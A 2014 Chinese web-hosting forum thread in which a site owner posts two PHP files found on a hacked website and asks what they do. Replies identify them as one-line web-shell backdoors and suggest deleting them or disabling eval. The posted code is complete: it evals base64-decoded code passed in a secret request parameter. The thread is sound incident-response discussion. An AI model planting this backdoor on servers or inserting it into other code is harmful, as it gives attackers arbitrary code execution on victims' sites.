全球主机交流论坛

标题: 网站被挂马，请高手解密挂马文件，谢谢！ [打印本页]

作者: cxd44 时间: 2014-3-1 20:33
标题: 网站被挂马，请高手解密挂马文件，谢谢！
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['f6505580303d77ebafb7a'])!=NULL){eval(base64_decode($_REQUEST['f6505580303d77ebafb7a']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['e6e777baec8cafc7d8f33eadd7f0'])!=NULL){eval(base64_decode($_REQUEST['e6e777baec8cafc7d8f33eadd7f0']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

作者: psdshow 时间: 2014-3-1 20:37
有什么好解密的
如果有参数 f6505580303d77ebafb7a，则将参数f6505580303d77ebafb7a的值base64_decode之后转换为可执行代码
（想做什么都可以，只要php有权限的）
否则页面显示 Access denied. 几个字

作者: dazeng 时间: 2014-3-1 20:45
这个就是所谓的一句话密码吧？在客户端提交代码执行的

作者: cxd44 时间: 2014-3-1 20:49

psdshow 发表于 2014-3-1 20:37
有什么好解密的
如果有参数 f6505580303d77ebafb7a，则将参数f6505580303d77ebafb7a的值base64_decode之后 ...

不是后门程序？

作者: psdshow 时间: 2014-3-1 20:57

cxd44 发表于 2014-3-1 20:49
不是后门程序？

一句话木马
不是后门还是什么

作者: cxd44 时间: 2014-3-1 21:00

psdshow 发表于 2014-3-1 20:57
一句话木马
不是后门还是什么

那如何防范？

作者: Kvm 时间: 2014-3-1 21:07
删除文件或者禁用eval

作者: cxd44 时间: 2014-3-1 21:20

Kvm 发表于 2014-3-1 21:07
删除文件或者禁用eval

xiexie

作者: SKIDROW 时间: 2014-3-1 22:10

Kvm 发表于 2014-3-1 21:07
删除文件或者禁用eval

K妹你可真狠，eval都禁……

欢迎光临全球主机交流论坛 (https://loc.888543.xyz/)